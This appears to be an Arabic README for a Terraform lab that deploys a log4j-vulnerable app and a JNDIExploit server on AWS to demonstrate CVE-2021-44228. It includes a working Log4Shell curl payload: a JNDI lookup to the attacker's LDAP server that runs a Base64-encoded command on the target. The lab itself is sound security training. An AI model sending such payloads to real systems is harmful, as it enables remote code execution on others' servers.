
Terraform لنشر تطبيق ضعيف وJDNIExploit للعمل مع CVE-2021-44228
قالب Terraform لنشر تطبيق ضعيف وأداة JNDIExploit للعمل مع CVE-2021-44228
ينشئ هذا الـ Terraform مثيلين على شبكة VPC داخل سحابة AWS.
كل ما تحتاجه هو تصدير AWS_ACCESS_KEY_ID وAWS_SECRET_ACCESS_KEY
المثيل الأول هو JNDIExploit.
الثاني هو Vulnerable-App لاستغلال log4j.
يرجى استبدال مفتاح SSH العام الخاص بك في terraform قبل تنفيذ apply
terraform init
terraform plan
terraform apply --auto-approve
بعد النشر على AWS، يمكنك استغلال التطبيق بطلب curl، والتحقق من إنشاء ملف في /tmp داخل حاوية vulnerable-app.
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
على خادم التطبيق vulnerable-app، نفّذ الأمر التالي للتحقق من تنفيذ الأوامر؛ يجب أن ترى ملف pwned.
sudo docker exec -ti vulnerable-app ls /tmp